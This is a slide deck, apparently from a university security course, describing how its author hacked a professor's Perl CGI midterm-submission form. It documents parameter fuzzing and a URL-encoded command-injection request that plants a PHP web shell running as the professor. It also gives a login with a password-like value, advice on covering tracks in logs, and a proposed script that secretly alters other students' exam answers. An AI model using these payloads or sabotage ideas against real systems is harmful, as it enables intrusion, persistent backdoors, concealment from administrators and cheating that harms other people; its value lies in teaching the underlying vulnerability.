Upload
hillary-randall
View
213
Download
0
Embed Size (px)
Citation preview
About Me
UCCS – B. S. Computer Engineering ’05 UCCS – M.E.I.A ever since
Just need to finish project :(
iCTF (International Cyber War Games) Going on 4th year with UCCS
The MITRE Corporation Beautiful Girlfriend Kelly Interests in RE, etc.
Intro
Actually hacked the Review Assume actual test just like review
No source code Locked Down
Already have read access to most things (shell access) Other people’s midterms, etc. Misc auth files Do we even need to hack it? Maybe … What’s out
goal?
http://cs.uccs.edu/~cs502/CS502M2008midterm.html
How does the midterm work? Fill out form and press Submit
Username Password Answers
Form checks credentials Save’s midterm to disk Emails midterm to Dr. Chow and
User
The Midterm
On Submit
Echo’s out everything submitted
and at the bottom of the screen…
name=exam, value=CS502M2008midterm
class=CS502, year=2008, semester=M2008 term=midterm
open filename=CS502M2008Grade.txtlogin incorrect!
What we do know
Form is .cgi Probably Perl
Form check’s authentication in file: CS502S2008Grade.txt
/users/server/faculty/chow/public_html/cgi-bin/grade/CS502S2008Grade.txt
Said so (in lesser words) on the web page
Assumptions: Potentially grepping username file for valid
credentials Probably using Perl’s open command
What we do know (cont.)
Exams are saved here: .../public_html/cgi-bin/grade/CS502/
CS502M2008midterm/
Exams saved in the format: exam_username_108_7_date
First Thought
Probably doesn’t check input values from CS502S2008Grade.txt Why would you, it’s trusted?
Exploit the trusted If we could potentially change a username in
there might be able to exploit unchecked variables
If a file is echo’ed out with unchecked names, we could execute arbitrary system commands
Finding out more
Just hitting Submit (Empty exam) posts the following: exam=CS502M2008midterm&name=&login=&pass
wd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
Why does it send: CS502M2008midterm? Probably written to be generic
Returns: name=exam, value=CS502M2008midterm class=CS502, year=2008, semester=M2008
term=midterm open filename=CS502M2008Grade.txt login incorrect!
Modifying Requests
Empty exam omitting CS502M2008midterm : exam=CS502M2008midterm&name=&login=&pa
sswd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
Sending no exam parameter Change to exam=&name=&login=…
Returns name=exam, value= class=, year=, semester= term= open filename=Grade.txt login incorrect!
Modifying Requests (cont.) Send the following (fuzzing)
exam=abcdefghicjklmnopqrstuvwxyz&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
Returns name=exam,
value=abcdefghicjklmnopqrstuvwxyz class=abcde, year=ghic, semester=fghic
term=jklmnopqrstuvwxyz open filename=abcdefghicGrade.txt login incorrect!
Assumptions First 10 letters of exam is appended to Grade.txt
authentication file 10 letters is not a lot to work with Probably does a split of exam[1..10]
*Grade.txt
First thought, try to change location of Grade.txt If we control it, we control potentially
unchecked input Assumptions
Probably issuing the following command open “~chow/…/” + $10char + Grade.txt This would prevent from using /tmp because of
the leading file path /tmp/abcGrade.txt
This may be an avenue but found other solution so stopped pursuing this
Split Exam Input Value into two Parameters Exam value appears somewhere else
../ public_html/cgi-bin/grade/CS502/CS502M2008midterm/*exams
First 10 character CS502M2008 appended to Grade.txt CS502M2008Grade.txt
Why do we upload the entire string CS502M2008midterm???
CS502M2008midterm
Since CS502M2008 is used for authentication we should leave this alone
Let’s modify midterm and see what it does… Change exam=CS502M2008midterm to
exam=CS502M2008blah Unauthenticated it creates a directory:
../ public_html/cgi-bin/grade/CS502/CS502M2008blah
Authenticated it creates a directory CS502M2008blah and writes out exam and then emails Don’t think I actually ever did this authenticated
If Authenticated
If folder for this midterm doesn’t exist, create it
Upload Exam to folder Email Out copy to Dr. Chow and me
Assumptions Code maybe calls a mkdir or users perl to create
the directory Probably uses perl to write out the file Probably not writing socket code to do a SMTP
call
Email Out
How does this work?
Email Out
Probably something like this: exec(
mail -s exam [email protected] [email protected] < $dir_to_exam/$exam )
Probably doesn’t check the $dir_to_exam Why would a directory name contain malicious
content? Can’t change $exam ($exam ~= $user_name)
and we can’t change $user_name w/o modifying *Grade.txt
But we can modify $dir_to_exam!!!! Our fuzzing even showed it could be any length
Authenticated vs. Unauthenticated Regardless of authentication a
directory is created Creating directories doesn’t do very
much for us
Only if authenticated with it run the mail program command
Execute My Command
Modify the following: exam=CS502M2008midterm&name=&login=
&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
To: exam=CS502M2008COMMAND&login=_LOGI
N_&passwd=_PASSWD_ Note: if we don’t login correctly, the mail
program won’t get executed By keeping CS502M2008 the system will
use CS502M2008Grade.txt to authenticate us We (I) have (had) a username in this file
New Request
Need help encoding URLs: http://www.w3schools.com/TAGS/
ref_urlencode.asp
Let’s upload the following command: & echo "<?php exec(\$_GET['command']); ?>" >
a.php & %26+echo+%22%3C%3Fphp+exec%28%5C
%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26
exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&passwd=111-22-3333
Last Request
exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&passwd=111-22-3333
Creates a directory called: CS502M2008& echo "<?php exec(\
$_GET['command']); ?>" > a.php &
Mail Program
Assumption exec(
mail -s exam [email protected] [email protected] < $dir_to_exam/$exam )
Is now turned into: exec(
mail -s exam [email protected] [email protected]
< & echo "<?php exec(\$_GET['command']); ?>" > a.php & /$exam )
Successfully create …/grade/a.php that takes commands and runs them as Dr. Chow
Conclusions
Consequently, this hack appears to never send out an email – Dr. Chow is never notified that it was hacked Or does it? It doesn’t, verified.
Logs usually only show GETs, not POSTs Clean up directories we’ve create and we’ve covered our
tracks
Using the a.php to upload commands uses GETs. Everything is probably logged there Can easily change this to POSTs
Probably a wise idea to secure anything that remotely looks like a production system.
Backups
Evil Things to Do
Average test may take ~30+Minutes
Injecting JS that every 5-10 minutes, picks a multiple choice question and changes the answer Slow enough which people may not notice
the change If the user prints out a copy, hard copy will
be wrong too
Goal: Lower everyone else's test scores by some reasonable amount to put yourself at the top of the curve
IDS
IDS probably could not have stopped this Least not initially
This is a security test therefore answers that would normally be acceptable, IDS might throw away i.e. how would you hack this site